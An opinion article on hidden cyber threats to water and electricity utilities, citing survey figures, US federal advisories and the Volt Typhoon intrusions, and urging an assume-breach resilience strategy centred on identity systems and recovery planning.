The Biggest Threat to Critical Infrastructure Is the One You Can’t See

Flip a switch on the wall, and the lights turn on. Turn on your kitchen faucet, and water comes out. These are basic amenities: things we take for granted and would struggle to live without. They are a part of the critical infrastructure that operates silently in the background, keeping our lives on track. The fact that these services have remained reliable and available for generations is a testament to decades of hard work and ingenious engineering. But what has taken decades to build and maintain can be destroyed in a matter of moments. 

Just beneath the surface, a growing concern exists around the critical infrastructure that underpins much of our day-to-day lives. That concern stems from an incontrovertible fact: cybercriminals and nation-state actors are already inside these essential systems, lying dormant and waiting for the most opportune moment to strike. A recent Semperis report analyzing cyberattacks targeting water and electricity operators across the United States and the United Kingdom found that 62% of utility operators were targeted in the past year. Of those attacked, 80% suffered multiple incidents. More than half (54%) experienced permanent corruption or destruction of data and systems.

These are bleak statistics, but they are getting worse. The stat that concerns me most is that over a third (38%) of utility operators reported not being targeted at all. On its surface, this sounds like good news. But any seasoned cybersecurity pro would hear this and immediately understand what it means: sneakier, more sophisticated attacks by malicious actors are simply going undetected.

Washington Sounds the Alarm

The lurking threat may be under the radar for critical infrastructure organizations, but federal authorities are paying attention. In December 2024, the Cybersecurity and Infrastructure Security Agency (CISA) and Environmental Protection Agency (EPA) issued a cybersecurity advisory, highlighting the persistent threat of cyberattacks on water systems and the dangers posed by both criminal groups and nation-state actors. That notice came just days after a cybersecurity incident in Arkansas City, Kansas, forced utility operators to switch to manual operations —a real-world example of how quickly digital compromise can disrupt physical services.

This was not an isolated warning. In May 2025, CISA, the FBI, the EPA and the Department of Energy (DOE) jointly issued another advisory warning that even “unsophisticated” hackers are successfully targeting organizations in the U.S. Oil and Natural Gas sectors. That warning recognized that not all attacks are carried out by nation-states, and that critical infrastructure remains vulnerable to low-bar attackers leveraging poorly secured systems or default credentials.

These advisories underscore a growing consensus in the cybersecurity community: attacks on critical infrastructure are no longer speculative. They are here, persistent, and escalating in both frequency and severity.

The Invisible Threat: Living Off the Land

Unlike headline-grabbing ransomware attacks that trigger immediate alarms, today’s critical infrastructure threats are quieter, making them much more challenging to detect. Sophisticated attackers now leverage legitimate tools and identity credentials to evade detection. By compromising identity systems like Active Directory or Okta, malicious actors can gain long-term access to systems. They blend in and wait patiently for the right moment to strike. There is very little in our industry that’s more dangerous than a false sense of security, and that’s precisely what many companies in the utility sector have. All of this increases the risk that critical systems may be vulnerable to sabotage before defenders even realize they’ve been breached.

The report from Semperis makes it clear: many utilities are already compromised and they don’t know it. The traditional indicators of compromise, such as ransom notes, system crashes, and exfiltrated data, give way to silent persistence. Quick paydays are passe. Attackers are now prioritizing long-term, strategic disruption. Often, these efforts are supported by nation-state actors with sophisticated capabilities and geopolitical motives. 

Look no further than China’s Volt Typhoon for an example. Their lack of a calling card is, in fact, their calling card. By quietly penetrating networks and planting backdoors, they’re able to infiltrate networks and gather intelligence for months (or even years) – and plant the cyber equivalent of bombs to be detonated should it suit their purpose. An example is the Littleton Electric, Light & Water Department, the MA-based utility that was breached in 2023 by Chinese state-sponsored hackers. Volt Typhoon infiltrated its systems and remained undetected for nearly a year. We refer to this as “living off the land” (LOTL), where attackers exploit legitimate administrative tools and processes to remain undetected. These methods make traditional security indicators ineffective, as malicious activity blends seamlessly with normal operations. It’s been an effective strategy for groups like Volt Typhoon, and they are by no means the only ones.

Unfortunately, most utilities are ill-equipped to battle sophisticated adversaries. Their operational technology (OT) wasn’t designed with cybersecurity or internet access in mind, and in many cases hasn’t been updated in years. They still rely on outdated tools and practices to detect breaches, such as perimeter monitoring, signature-based antivirus, and legacy SIEM systems that were not built for stealthy, identity-centric attacks. There are no mincing words; their entire approach needs to change. 

Proactive Resilience, Not Passive Defense

The status quo for critical infrastructure cyber defense is not good enough. And there are no easy fixes. Unfortunately, it’s not a matter of merely tweaking strategies for better detection or stronger perimeter defense. Security teams need to fundamentally shift toward a proactive resilience strategy based on a simple (but hard-to-swallow) assumption: that compromise has already occurred.

If you can’t protect everything, you must prioritize it. The first step in this process is to identify “Tier 0” infrastructure —the systems essential to business continuity. These include identity providers like Active Directory and cloud identity platforms, as well as configuration management and backup systems. Organizations should prioritize incident response, crisis management, and recovery planning around these assets. Even if the broader environment is compromised and everything is crumbling around you, the ability to restore Tier 0 infrastructure is foundational to cyber resilience. 

Next, all stakeholders, not just IT and security, must understand the steps to take in a crisis. Recovery processes simulating real-world attack scenarios must be documented and rehearsed across all departments. Cyberattacks will put tremendous stress on every department, including security, operations, legal, and communications. You need to be able to test their ability to withstand that pressure and coordinate with each other, and regular rehearsal reinforces this.

Finally, you need to prioritize strategies that ensure recovery is not only fast but also secure. Attackers often attempt to compromise backups to maintain persistence in the environment, even after recovery attempts. It’s critical to identify and deploy solutions that support speed, security, and visibility in crises, and help you quickly re-establish trust in your critical systems.

Cyber resilience must become the guiding principle of utility cybersecurity strategy, not only to protect operational uptime and public safety, but also to safeguard national stability. Utilities may not be on the frontlines of international conflict, but they are often the first targets of attack. In this high-stakes environment, assuming compromise is not paranoia: it’s prudent planning. Because if your organization hasn’t seen an attack lately, it might not be a sign of safety. It might just mean the attackers are still inside and waiting.